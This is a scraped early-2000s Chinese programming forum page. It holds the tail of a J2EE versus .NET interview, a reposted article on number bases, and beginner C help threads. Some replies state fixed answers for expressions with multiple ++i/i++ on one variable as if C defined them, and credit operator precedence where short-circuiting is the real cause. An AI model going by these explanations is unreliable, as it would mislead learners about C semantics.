Jim Farley:如果你能够忽略平台问题，那么严格上说你就要做一个人为选择：你最喜欢用哪种语法/编程模型/对象模型？就我个人观点来讲，这几种模型都是没有明确界限的，但是，平台会对此作一个硬性规定，Java是J2EE的基础，C#和一般运行环境是.NET单一平台的基础。因此，C#同java的比较实际上又回到了J2EE 同 .NET进行比较这一问题上。

Joe:针对Java Pet Shop的应用，微软对.NET及其性能、代码缩减等问题作了很多改进，针对这一点您有何评价？.NET的速度真的是更快吗？

Jim Farley:我想，很明显这只是一种推销手段而已。我认为所谓的代码缩减只是一个幌子，如果我单纯只是为了易于管理而缩减代码，这并不是明智之举，更谈不上其对基础架构有何真正意义。如果你要对不同商家的产品进行比较的话，只能比较它们的性能，而不能把.NET的某一方面的突出特点同J2EE的整体基础架构进行比较。

Al-Bandy:有什么功能是.NET能够实现而J2EE不能实现的？同时，有什么功能是J2EE能够实现而.NET不能实现的？这两者之间有什么明显的差别吗？

Jim Farley:如果要完整的回答这个问题可能要占用很多时间！如果想要更多了解这些，可以看看我写过的一篇文章Software Development里面提到了这些。在这里，我只能简单地说.NET在XML和Wintel集成方面比较擅长而J2EE则在方便性和可选择性上存在优势。

David from BofA:根据您所说的在J2EE 和 .NET之间不可能存在明显的区分界限，那么，对于一个初学者来说，哪一个更适合初学者来学习（假设必须选其一的话）。

Jim Farley:如果从内容以外来对两者进行比较是很困难的，这要看你为哪种类型企业工作、你的客户喜欢什么、你将来的技术/市场策划是什么等等许多因素。如果你打算只在微软这种只使用Wintel的环境下做一些前瞻性的工作（无论是为个人还是为企业），那么显而易见，.NET是首选之举。如果你认为自己不是唯一的商家，而是要考虑到来自于其他平台的竞争，或者你想把你自己的产品和客户发展到其他平台上，那么J2EE将是你最佳选择。

Joe:J2EE和.NET的工具好像都是遵循W3C标准（SOAP, WSDL），那么您认为哪一个是不标准的、自我封闭的？

Jim Farley:事实上，他们的确遵循这些标准，但是，商家也会"包含和扩展"它们的工具（例如，为封装协议增加"value-added"的扩展，或者是定义硬盘备份的有效载荷等等）。因此，如果他们完全100%遵循SOAP/WSDL/，那么，你就无需担心。但是正确与否就要看微软和J2EE了。

MrWeb:据我了解，.NET基础架构并不支持持续性管理，如果真是这样的话，这将是一个很大的缺陷。

Jim Farley:从一定程度上来讲这是事实，COM+（.NET的一个组成模型）并不支持自动持续管理。同时EJB也需要CMP，在一定意义上来说，这确实是.NET的一个缺陷（有利必有弊）。但是，也有很多人认为，利用有效的"delivered value"，利用EJB进行持续性管理和促使商家在J2EE平台上运行远不如把精力集中在其他领域上，象WEB服务。我个人比较同意这种观点。但是，从另一个方面讲，我认为积极的与Java进行沟通，相互取长补短，最后必将会取得突破性的成就，因此，对于J2EE我们应该两种态度并存。

greg: 如果这样与微软的CRL竞争发展下去，Java将会怎样发展？因为对于微软来讲，CRL是一个强大的开发工具，它能够让开发人员不需做额外的工作即可把时间代码应用到系统中，针对这一点，Java做何反应？

Jim Farley:我不同意在多语言环境下使用CRL来达到"不增加开发人员额外工作量"的这一观点。你应该学习一下CRL的结构模型和".NET-ified"语言的可变语法。但是，关于Java对于这一问题的反应，我们已经看到和听到了象ForteTM软件等以Java为核心的多语言支持的反响。过去，尽管这些成绩并不表示它已经成功了，但是已经有很多为JavaTM虚拟应用的交叉编译器了。但是到现在为止，我还没有看到Sun和Java团体想要在这一领域的详细计划，当然我没有任何指责的意思。

nigelk:您是否有一些关于J2EE和.NET在统一市场领域内相比较的统计数字或者猜想？它们确实是在同一市场参与竞争吗？还是说微软有意在其传统领域内减少自己的规模？

Jim Farley:这是一个很好的问题，现在在我身边没有什么硬性的统计数字，同时我也不相信任何统计数字，因为它们都存在一定的偏见。但是现在我们所听到的一些信息在很大程度上是对的，微软不是做一个选择而是象.NET转变-这一转变将是更大更昂贵的转变。.NET现在吸引了许多中小企业，因为不但成本低，而且微软的工具也有很大优势。但是许多典型的大企业还是担心不同的开发环境存在需要协调不同的商家等问题，因此，对他们而言，Java就比较适用。当然，我并不是说事务不会向另一个方向发展，这只是我个人的一些观点。

terian3:上述许多关于反对使用.NET的讨论基本上都集中在它的方便性上，那么，你们对.NET CLI 和C#在其他平台上（象Mono project）的规范化有没有什么意见和想法，.NET的non-Wintel 运行环境的成功对J2EE有什么影响？

Jim Farley:我认为.NET的non-Wintel对市场是一个强有力的冲击，但是必须要得到微软的支持。尽管微软已经宣称其公开化和参与标准化（受一定的限制），但是其基础架构仍然在其控制之下。这样，如果没有微软的支持，如此反复，在下一个版本中将会与.NET的兼容性越来越差。如果微软同意把CLR/CLI绑钉到Linux和其它的non-Wintel平台上，那么在今后的竞争中，将会有一个戏剧性的转变。把一个标准同另一个标准相比较，就会正确的看待J2EE和.NET。但是，如果是那样的话，对于微软的发展方向将会有一个很大的转变，结果也会十分令人惊讶（就象Sun公开其Java源程序一样）。

sachin:当把J2EE和.NET相比较时，从平衡现有的系统投资的WEB服务角度来讲，二者之间的最大冲突在哪儿？

Jim Farley:这要看在你的概念里"bang for the buck"具体值得是什么？如果你仅仅是想把产品尽快投入市场上去，而不关心其长期发展的话，那么大多数人都会对微软的产品感兴趣（尤其是Visual Studio）。如果你指的是在现有基础架构投资上长期发展ROI的话，那么我认为，J2EE将会是最后的赢家。

Chris Riner:我想进一步了解J2EE和.NET，以便能对两者进行更深入的比较和学习它们的相关技术，您能否就关于这方面的书或资料给我一些建议？

Jim Farley:我刚刚想起来我还没有跟你们提到我的书，《Java Enterprise in a Nutshell》。至于.NET，现在有很多关于它的资料，象O'Reilly 和 Prentice Hall写的，但是具体名字我想不起来了。一般来讲，找一些没有偏见的客观的资料来学习，那些有一定主观色彩的文章不是最佳选择。

nigelk:J2EE与.NET之间的比较同其他旧有的平台或技术之间的比较是不同的。尽管是这种情况，但是我想，由于二者所能提供的功能非常相似，所以在具体选择哪一种工具上并没有明确的理由。要想做出选择只能靠企业自身的技术或经验。

Jim Farley:是的，我再说一遍这是正确的，我已经说过了内容就是一切-技术和经验是一个强有力的因素，另外的因素就是企业模式、用户需求以及市场发展趋势等等。就我个人经验而言，没有任何情况象.NET那样需要专门的平台和封闭性。因此，J2EE平台是我的选择。但是，这样也会出现很多情况。就象我们所提到的那样，估计二者的特性，选取一种适合自己的。

MDR-EdO:时间过得真快，感谢各位今天的参与，同时我们也讨论了很多问题，当然，我更要感谢Jim为我们做的精彩回答。

Jim Farley:感谢各位的参与，同时你们也提出了很多很好的问题，如果你们还对此有兴趣可以与我联系jfarley@alum.rpi.edu，我非常乐意听到大家关于J2EE和.NET在WEB服务上的一些观点和想法。因为我本人也在做关于这方面的一些研究课题。最后祝大家生活快乐。

情归秋雪缠绵叶，恨是西风寂寞花。最痛处，别后离愁… …

Blueidea Web Team
Moderator Of Photoshop & Imagerady Forum

上一贴 | 下一贴
快速回复 主题：[转载]Java 2 企业版与.NET
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]


不好往那个专栏发这帖~~：（ - 经 典 论 坛

经典论坛 PS版与艺设版 联合举办 『设计四连击』 设计接龙

计算机技术
不好往那个专栏发这帖~~：（

上一贴 | 下一贴
发表人 主题: 不好往那个专栏发这帖~~：（
print

终级用户
积分：805
发帖：227
来自：萍乡 江西
注册：2001-12-13
 发表于 2002-01-17 10:57:35 按此观看print的个人资料 该用户不允许显示它的电子邮件 收藏该主题供以后查看 发送悄悄话给print 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看print的IP
二进制，八进制，十进制，十六进制 他们之间怎么运算 怎么表达的呢？麻烦大家有没有关于这的资料呢？谢谢了。

变化并不可怕，可怕的是你不随着变化而变化。
啸

无意
现任版主
积分：6225
发帖：2154
来自：
注册：2000-08-01
 发表于 2002-01-17 11:12:11 按此观看啸的个人资料 按此发邮件给啸 发送悄悄话给啸 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看啸的IP
找本书看看吧，基本上一些基础编程的或者讲微机原理的书上都有很详细的介绍。

在网上找了一篇，你看看吧。
http://www.zjou.edu.cn/te/BASE/base14.htm

引用:

1．计数制

在日常生活中，人们习惯于用十进制计数。但是，在实际应用中，还使用其他的计数制，如二进制（两只鞋为一双）、十二进制（十二个信封为一打）、二十四进制（一天24小时）、六十进制（60秒为一分，60分为一小时）等等。这种逢几进一的计数法，称为进位计数法。这种进位计数法的特点是由一组规定的数字来表示任意的数。例如一个二进制数，它只能用0和1，一个十进制数只能用0，1，2，…，9，一个十六进制数用0，1，2，……9和A～F十六个数字符号。
进位计数制的数可以用位权来表示。位权就是在一个数中同个数字在不同的位置上代表不同基数的次幂。任何一个数的值都可以用它的按位权展开式表示：
(R)P=Rn-1*Pn-1+...+R0*P0+R-1*P-1+...+R-n*P-n

其中R是一个P进制的数。P为基数，它可以是2、8、10、16等等。
例如一个十进制数(222.26)10可以表示为：

(222.26)10＝2*102＋2*l01＋2*100+2*l0-1+6*l0-2

在这个例子中，十进制数222.26中的2在不同位置上所代表的值是不相同的，在百位上的值是200，在十位上的值是20，在个位上的值是2，而在小数点后第一位数为0.2。但它在不同位置上的数字符号是相同的。

2．二进制

计算机是由电子器件组成的，考虑到经济、可靠、容易实现、运算简便、节省器件等因素，在计算机中的数都用二进制表示而不用十进制表示。这是因为，二进制计数只需要两个数字符号0和1，在电路中可以用两种不同的状态——低电平（0）和高电平（1）来表示，其运算电路的实现比较简单，要制造有10种稳定状态的电子器件分别代表十进制中的10个数字符号是十分困难的。
在计算机内部，一切信息的存储、处理与传送均采用二进制的形式。但由于二进制数的阅读与书写很不方便，为此，在阅读与书写时又通常用十六进制或八进制来表示，这是因为十六进制和八进制与二进制之间有着非常简单的对应关系，下表给出了常用计数制的对照表。

十进制 二进制 八进制 十六进制
0 0 0 0
1 1 1 1
2 10 2 2
3 11 3 3
4 100 4 4
5 101 5 5
6 110 6 6
7 111 7 7
8 1000 10 8
9 1001 11 9
10 1010 12 A
11 1011 13 B
12 1100 14 C
13 1101 15 D
14 1110 16 E
15 1111 17 F

二进制计数法有如下特点：
l）只有两个数码，即0和1。
2）逢二进一。
3）数码的位置原理。

二、各种数制间的转换

由于不同的进位计数制所用的数字个数是不相同的。利用上表能较方便地对不同数制的数进行转换。

1．二进制转换成十进制

任何一个二进制数的值都用它的按位权展开式表示。例如：将二进制数(10101.11)2转换成十进制数。
(10101.11)2＝1*24＋0*23＋l*22＋0*21＋1*20＋l*2-1＋l*2-2

＝24＋22＋20＋2-1+2-2＝(21.75)10

2．十进制转换成二进制

将十进制整数转换成二进制整数采用“除2取余法”。即将十进制整数除以2，得到一个商和一个余数；再将商除以2，又得到一个商和一个余数；以此类推，直到商等于零为止。

每次得到的余数的倒排列，就是对应二进制数的各位数。

于是，结果是余数的倒排列，即为：

（37）10＝（a5a4a3a2a1a0)＝（100101）2

3．十进制小数转换成二进制小数

十进制小数转换成二进制小数是用“乘2取整法”。即用2逐次去乘十进制小数，将每次得到的积的整数部分按各自出现的先后顺序依次排列，就得到相对应的二进制小数。
将十进制小数0.375转换成二进制小数，其过程如下：

最后结果 [image] 0.375)10＝(0.a1a2a3)2＝(0.011)2

4．八进制转为二进制

将八进制数转换成二进制数是每位八进制数用三位二进制数表示。
例：八进制数(617.34)8转换成二进制数为：
6 1 7 ． 3 4
110 001 111 ．011 100
即(617.34)8＝(110001111.011100)2

5．二进制转为八进制

二进制数转换成八进制数，是将二进制数的整数部分从右向左每三位一组，每一组为一位八进制整数。
二进制小数转换成八进制小数是将小数部分从左至右每三位一组，每一组是一位八进制的小数。若整数和小数部分的最后一组不足三位时，则用0补足三位。例如:

(11001111.0111)2=(011001111.011100)2

=( 3 1 7 . 3 4 )8

6．十六进制转为二进制

由于24＝16，所以每一位十六进制数要用四位二进制数来表示，也就是将每一位十六进制数表示成四位二进制数。
例：将十六进制数(B6E.9)16转换成二进制数为：
B 6 E . 9
1011 0110 1110 . 1001
即（B6E.9)16＝(101101101110.1001)2

7．二进制数转为十六进制

将二进制数转换成十六进制数是将二进数的整数部分从右向左每四位一组，每一组为一位十六进制整数；而二进制小数转换成十六进制小数是将二进制小数部分从左向右每四位一组，每一组为一位十六进制小数。最后一组不足四位时，应在后面用0补足四位。

例：二进制数(1010101011.0110)2，转换成十六进制数为：
0010 1010 1011 ．0110
2 A B . 6

即：(10 1010 1011.0110)2=(2AB.6)16

三、计算机中数的表示与运算

在计算机中，对于一般的数是采用定点数与浮点数两种方法来表示。

1．定点数

所谓定点数是指小数点位置固定不变的数。在计算机中，通常用定点数来表示整数与纯小数，分别称为定点整数与定点小数。
定点整数：一个数的最高二进制位是数符位，用以表示数的符号；而小数点的位置默认为在最低(即最右边）的二进制位的后面，但小数点不单独占一个二进制位，如图所示:

0 1001010010001010001

数符位 数值位 小数位

因此，在一个定点整数中，数符位右边的所有二进制位数表示的是一个整数值。
定点小数：一个数的最高二进制位是数符位，用来表示数的符号；而小数点的位置默认为在数符位后面，不单独占一个二进制位，如图所示：

0 1001010010001010001

数符位|小数位 数值位

因此，在一个定点小数中，数符位右边的所有二进制位数表示的是一个纯小数。

2．浮点数

在计算机中，定点数通常只用于表示整数或纯小数。而对于既有整数部分又有小数部分的数，由于其小数点的位置不固定，一般用浮点数表示。
在计算机中所说的浮点数就是指小数点位置不固定的数。一般地，一个既有整数部分又有小数部分的十进制数D可以表示成如下形式:

D＝R*10N
其中R为一个纯小数，N为一个整数。
如一个十进制数123.456可以表示成：0.123456*103，十进制小数0.00123456可以表示成0.123456*10-2。纯小数R的小数点后第一位一般为非零数字。
同样，对于既有整数部分又有小数部分的二进制数口也可以表示成如下形式：

D＝R*2N

其中R为一个二进制定点小数，称为D的尾数；N为一个二进制定点整数，称为D的阶码，它反映了二进制数D的小数点的实际位置。为了使有限的二进制位数能表示出最多的数字位数，定点小数R的小数点后的第一位（即符号位的后面一位）一般为非零数字（即为“1”）。
在计算机中，通常用一串连续的二进制位来存放二进制浮点数，它的一般结构如图所示：

阶符 N 数符 R

| 阶码部分 | 小数位 尾数部分

考虑到部分朋友上教育网比较慢，还是把文章引过来了。

[这消息被啸编辑过(编辑时间2002-01-17 11:14:45)]

宠辱不惊，坐看庭前花开花落；去留无意，任天上云卷云舒......

Blueidea Web Team.
Moderator Of Computer Technology Forum

sony

终级用户
积分：1222
发帖：329
来自：浙江省
注册：2001-10-05
 发表于 2002-01-17 20:50:40 按此观看sony的个人资料 按此发邮件给sony sony 的 oicq 是27869008,查看 27869008 的资料 发送悄悄话给sony 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看sony的IP
厉害! 不过何必如此长篇大论

许多夜晚，你轻柔地依偎在我的身上，用纤纤秀手触摸我身上娇嫩的地方，用小巧细嘴吸出我珍贵的体液，直到满足十分才肯松口离开，唉，这该死的蚊子。
xqlyg

超级用户
积分：362
发帖：92
来自：china
注册：2002-02-07
 发表于 2002-02-07 16:33:59 按此观看xqlyg的个人资料 按此发邮件给xqlyg xqlyg 的 oicq 是41770172,查看 41770172 的资料 发送悄悄话给xqlyg 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看xqlyg的IP
写那么多不累吗
上一贴 | 下一贴
快速回复 主题：不好往那个专栏发这帖~~：（
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]
显示签名 禁止笑脸转换

管理选项： 关闭主题 | 置于顶部 | 移动/归档 | 删除主题

跳转到:

dreamweaver MX 功能探索


一个C的小问题 - 经 典 论 坛

计算机技术
一个C的小问题

上一贴 | 下一贴
发表人 主题: 一个C的小问题
梅友酷子

初级用户
积分：73
发帖：29
来自：
注册：2001-10-08
 发表于 2001-12-18 16:02:20 按此观看梅友酷子的个人资料 该用户不允许显示它的电子邮件 收藏该主题供以后查看 发送悄悄话给梅友酷子 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看梅友酷子的IP
如果int =3；则k=（i++)+(++i)+(i++)执行过后k的值为_____，i的值为_____
答案是12，6
如果int =3；则k=（++i)+(++i)+(++i)执行过后k的值为_____，i的值为_____
答案是18，6
谁能解答一下具体的操作步骤

POPOEVER

N个蓝色大泡泡
版主
积分：22065
发帖：6045
来自：Keyframe
注册：2000-07-17
 发表于 2001-12-18 21:10:58 按此观看POPOEVER的个人资料 按此发邮件给POPOEVER 访问POPOEVER的主页 POPOEVER 的 oicq 是54888059,查看 54888059 的资料 发送悄悄话给POPOEVER 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看POPOEVER的IP
你漏写int i=3了吧？
C/C++都快忘光光了~~~

i++和++i两者虽然都是自加运算表达式，但是运算规则是不同的：
首先，i++表达式的值是i在自加之前就运算所得的值，也就是i的原值；而++i表达式的值是i在自加之后再运算所得的值。比如：int i=3,那么i++表达式的值是i自加前的值，等于3，然后再自加，i=4；而++i是i先自加，i=4，然后再运算++i，所以表达式的值为4。接下去看两个经典的例子：
1. int i=3, 求k=(i++)+(i++)+(i++);
看上去好象应该是k=3+4+5=12，其实不是。运算时根据i++的运算规则，i++表达式先取原值再i自加，所以应该是先取三个原值，k=3+3+3=9，然后再是i做3次自加，i=3+1+1+1=6。
2. int i=3, 求k=(++i)+(++i)+(++i);
计算机对表达式扫描后，根据++i的运算规则，i先自加然后表达式取值，所以应该先进行三次i自加，i=3+1+1+1=6，然后再表达式取值，k=6+6+6=18。

第二个示例已经回答你第二题了，那么第一题，int i=3, 求k=(i++)+(++i)+(i++)就很简单了：
计算机对表达式扫描后，根据++i的运算规则，i先自加然后表达式取值，所以中间的++i先进行i自加，i=i+1=4，++i取值为4，另外两个i++先取值后自加，所以是两个都是这时候i的原值，也就是4，然后进行两次i自加，i=i+1+1=6，k=4+4+4=12。

Turbo C里面的自加减运算运用得当可以增加代码可读性和运行效率，但是也有人为理解误区，像上面这种题目纯粹是为了教学，实际编程中一般不会这样写。由于我长时间不用C/C++，有什么解释得不对还请斧正~~~

[这消息被POPOEVER编辑过(编辑时间2001-12-19 01:45:23)]

XTree
无可救药地活着，睡眼朦胧地醒着
世界杯决赛那天我过30岁生日，不冲突吧...

Blueidea Web Team
Moderator Of DW & JS Forum
Chief Police Officer

梅友酷子

初级用户
积分：73
发帖：29
来自：
注册：2001-10-08
 发表于 2001-12-19 11:27:12 按此观看梅友酷子的个人资料 该用户不允许显示它的电子邮件 发送悄悄话给梅友酷子 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看梅友酷子的IP
完全明白了，太感谢了：）
再问一个小问题：
#define sum 10+20
main()
{
int b=0,c=0;
b=5;
c=sum*b;
printf("%d",c);
}
答案：110
为什么呢？
如果是
#define sum （10+20）
main()
{
int a=0,b=0,c=0;
a=sum;
b=5;
c=sum*b;
printf("%d",c);
}
答案：150 这150怎么算出的我明白，可是第一题的110是怎么回事呢？
POPOEVER

N个蓝色大泡泡
版主
积分：22065
发帖：6045
来自：Keyframe
注册：2000-07-17
 发表于 2001-12-19 12:39:17 按此观看POPOEVER的个人资料 按此发邮件给POPOEVER 访问POPOEVER的主页 POPOEVER 的 oicq 是54888059,查看 54888059 的资料 发送悄悄话给POPOEVER 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看POPOEVER的IP
1. sum=10+20, sum*b=10+20*5=10+100=110

2. sum=(10+20), sum*b=(10+20)*5=30*5=150

既然sum的赋值是表达式赋值，那么运算时就按照表达式的运算规则。()运算优先，没有()乘除法优先。

[这消息被POPOEVER编辑过(编辑时间2001-12-19 12:40:56)]

XTree
无可救药地活着，睡眼朦胧地醒着
世界杯决赛那天我过30岁生日，不冲突吧...

Blueidea Web Team
Moderator Of DW & JS Forum
Chief Police Officer

梅友酷子

初级用户
积分：73
发帖：29
来自：
注册：2001-10-08
 发表于 2001-12-19 15:31:38 按此观看梅友酷子的个人资料 该用户不允许显示它的电子邮件 发送悄悄话给梅友酷子 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看梅友酷子的IP
太谢谢了，泡泡兄，有问题我再问你啊
POPOEVER

N个蓝色大泡泡
版主
积分：22065
发帖：6045
来自：Keyframe
注册：2000-07-17
 发表于 2001-12-19 19:07:39 按此观看POPOEVER的个人资料 按此发邮件给POPOEVER 访问POPOEVER的主页 POPOEVER 的 oicq 是54888059,查看 54888059 的资料 发送悄悄话给POPOEVER 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看POPOEVER的IP
靠，我也已经N年不用C/C++了~~~

XTree
无可救药地活着，睡眼朦胧地醒着
世界杯决赛那天我过30岁生日，不冲突吧...

Blueidea Web Team
Moderator Of DW & JS Forum
Chief Police Officer

上一贴 | 下一贴
快速回复 主题：一个C的小问题
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]
显示签名 禁止笑脸转换

管理选项： 关闭主题 | 置于顶部 | 移动/归档 | 删除主题

跳转到:

dreamweaver MX 功能探索


POPOEVER兄，又要请教你了 - 经 典 论 坛

计算机技术
POPOEVER兄，又要请教你了

上一贴 | 下一贴
发表人 主题: POPOEVER兄，又要请教你了
梅友酷子

初级用户
积分：73
发帖：29
来自：
注册：2001-10-08
 发表于 2001-12-20 11:17:46 按此观看梅友酷子的个人资料 该用户不允许显示它的电子邮件 收藏该主题供以后查看 发送悄悄话给梅友酷子 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看梅友酷子的IP
若已定义int a=25,b=14,c=19,以下三项运算符（？：）
a++<=25&&b--<=2&&c ++ ? printf("***a=%d,b=%d,c=%d\n",a,b,c):printf("###a=%d,b=%d,c=%d\n"a,b,c)
的执行结果是（ ）
答案：###a=26,b=13,c=19
请问是怎么得出的？

大哥

超级用户
积分：322
发帖：112
来自：
注册：2001-12-20
 发表于 2001-12-20 11:28:32 按此观看大哥的个人资料 该用户不允许显示它的电子邮件 访问大哥的主页 发送悄悄话给大哥 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看大哥的IP
出题的人没有指明编译器的话，此题的答案就有问题！ 你不妨在TC＋＋、MSC＋＋、VC、CB上分别试试。

现实中绝对每人会这样写程序，因此不同的编译器对计算顺序不同定义是不会出问题的。

老哥我知道的就这么多了。
色眯眯的小疯狗

| AHO |
积分：5266
发帖：1401
来自：上海
注册：2001-09-23
 发表于 2001-12-20 14:17:44 按此观看色眯眯的小疯狗的个人资料 按此发邮件给色眯眯的小疯狗 色眯眯的小疯狗 的 oicq 是3584852,查看 3584852 的资料 发送悄悄话给色眯眯的小疯狗 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看色眯眯的小疯狗的IP
c为什么是19?

| 收藏贴 |
POPOEVER

N个蓝色大泡泡
版主
积分：22065
发帖：6045
来自：Keyframe
注册：2000-07-17
 发表于 2001-12-20 14:56:04 按此观看POPOEVER的个人资料 按此发邮件给POPOEVER 访问POPOEVER的主页 POPOEVER 的 oicq 是54888059,查看 54888059 的资料 发送悄悄话给POPOEVER 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看POPOEVER的IP
因为先检测执行前一个逻辑与表达式，这时a++和b--都执行，a=26,b=13，逻辑与表达式显然不满足条件，马上执行printf("###a=%d,b=%d,c=%d\n"a,b,c)，所以c++就跳过不执行了~~~

XTree
无可救药地活着，睡眼朦胧地醒着
世界杯决赛那天我过30岁生日，不冲突吧...

Blueidea Web Team
Moderator Of DW & JS Forum
Chief Police Officer

色眯眯的小疯狗

| AHO |
积分：5266
发帖：1401
来自：上海
注册：2001-09-23
 发表于 2001-12-20 15:24:53 按此观看色眯眯的小疯狗的个人资料 按此发邮件给色眯眯的小疯狗 色眯眯的小疯狗 的 oicq 是3584852,查看 3584852 的资料 发送悄悄话给色眯眯的小疯狗 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看色眯眯的小疯狗的IP
明白了

如果我没记错的话，应该是由于逻辑运算优先于符号运算的关系吧

很久没用c，有些生疏了

老实说，popoever真是个很不错的老师~~~~~

| 收藏贴 |
POPOEVER

N个蓝色大泡泡
版主
积分：22065
发帖：6045
来自：Keyframe
注册：2000-07-17
 发表于 2001-12-20 17:37:27 按此观看POPOEVER的个人资料 按此发邮件给POPOEVER 访问POPOEVER的主页 POPOEVER 的 oicq 是54888059,查看 54888059 的资料 发送悄悄话给POPOEVER 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看POPOEVER的IP
色眯眯的小疯狗在上个帖子中说
引用:
明白了

如果我没记错的话，应该是由于逻辑运算优先于符号运算的关系吧

Absolutely right!

XTree
无可救药地活着，睡眼朦胧地醒着
世界杯决赛那天我过30岁生日，不冲突吧...

Blueidea Web Team
Moderator Of DW & JS Forum
Chief Police Officer

上一贴 | 下一贴
快速回复 主题：POPOEVER兄，又要请教你了
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]
显示签名 禁止笑脸转换

管理选项： 关闭主题 | 置于顶部 | 移动/归档 | 删除主题

跳转到:

dreamweaver MX 功能探索


请求指导 - 经 典 论 坛

计算机技术
请求指导

上一贴 | 下一贴
发表人 | 主题: 请求指导
sgilb 高级用户 积分：187 发帖：76 来自： 注册：2001-09-16 | 发表于 2001-12-23 20:36:06 按此观看sgilb的个人资料 该用户不允许显示它的电子邮件 收藏该主题供以后查看 发送悄悄话给sgilb 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看sgilb的IP vb语言和sql server数据库语言有什么差别，两者有什么联系，菜鸟我想用几个月时间 学会这两种，有可能吗？该如何开始？请这方面的高人指点一下。 每次我们那的数据库要修改，就会出现点故障，我不知道是程序员故意 搞鬼还是无意的，所以我想了解学习一下。至少能让我看懂他在做什么。
jet 我心飞翔 现任版主 积分：5452 发帖：1690 来自：Xi`an 注册：2000-06-18 | 发表于 2001-12-24 01:23:52 按此观看jet的个人资料 按此发邮件给jet 访问jet的主页 jet 的 oicq 是952265,查看 952265 的资料 发送悄悄话给jet 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看jet的IP vb可以用来做程序，sql是访问数据库的时候用的语言，如果你的vb程序要访问数据库，就要在vb里用sql。 Add Web To Life Blueidea Web Team. Moderator Of Dreamweaver Forum 长的很有创意，活的很有勇气
上一贴 | 下一贴
快速回复 主题：请求指导
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]


再请教两道C的问题 - 经 典 论 坛

dreamweaver MX 功能探索

计算机技术
再请教两道C的问题

上一贴 | 下一贴
发表人 主题: 再请教两道C的问题
梅友酷子

初级用户
积分：73
发帖：29
来自：
注册：2001-10-08
 发表于 2001-12-24 15:56:28 按此观看梅友酷子的个人资料 该用户不允许显示它的电子邮件 收藏该主题供以后查看 发送悄悄话给梅友酷子 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看梅友酷子的IP
问1：
main()
{
int c,x,y:
x=1;
y=1;
c=0;
c=x++||y++；
printf("\n%d%d%d\n",x,y,c);
}
结果为什么会是211？
X和Z的值我知道，可y的值怎么会是1呢？
问2：
main()
{int x;
scanf("%d",&x);
if(x++>5)printf("%d",x);
else printf("%d\n",x--);
}
答案怎么会是7和5
5是怎么得出的？

[这消息被梅友酷子编辑过(编辑时间2001-12-24 16:09:09)]

张无忌

win1st
管理员
积分：7152
发帖：3115
来自：Blueidea.com
注册：2000-09-10
 发表于 2001-12-24 16:56:27 按此观看张无忌的个人资料 按此发邮件给张无忌 访问张无忌的主页 发送悄悄话给张无忌 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看张无忌的IP
第一个问题，
c的编译过程中，遇到 || 运算符的处理方式是这样的：它会先比较||左边的表达式，一旦左边的表达式非0，那么就结束对||之后的运算，这是c语言的特点。
同样，遇到多个||的时候，比如xx||yy||zz，此处按照从左至右的顺序，出现非0时节结束。

问题2，你没说明你的输入值，不过我想这也是一道说明x++和x--以及++x,--x的问题，没什么特别的，注意顺序而已。

态度决定一切

Blueidea Web Team
Team Member

POPOEVER

N个蓝色大泡泡
版主
积分：22065
发帖：6045
来自：Keyframe
注册：2000-07-17
 发表于 2001-12-24 17:15:52 按此观看POPOEVER的个人资料 按此发邮件给POPOEVER 访问POPOEVER的主页 POPOEVER 的 oicq 是54888059,查看 54888059 的资料 发送悄悄话给POPOEVER 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看POPOEVER的IP
1.同无忌;
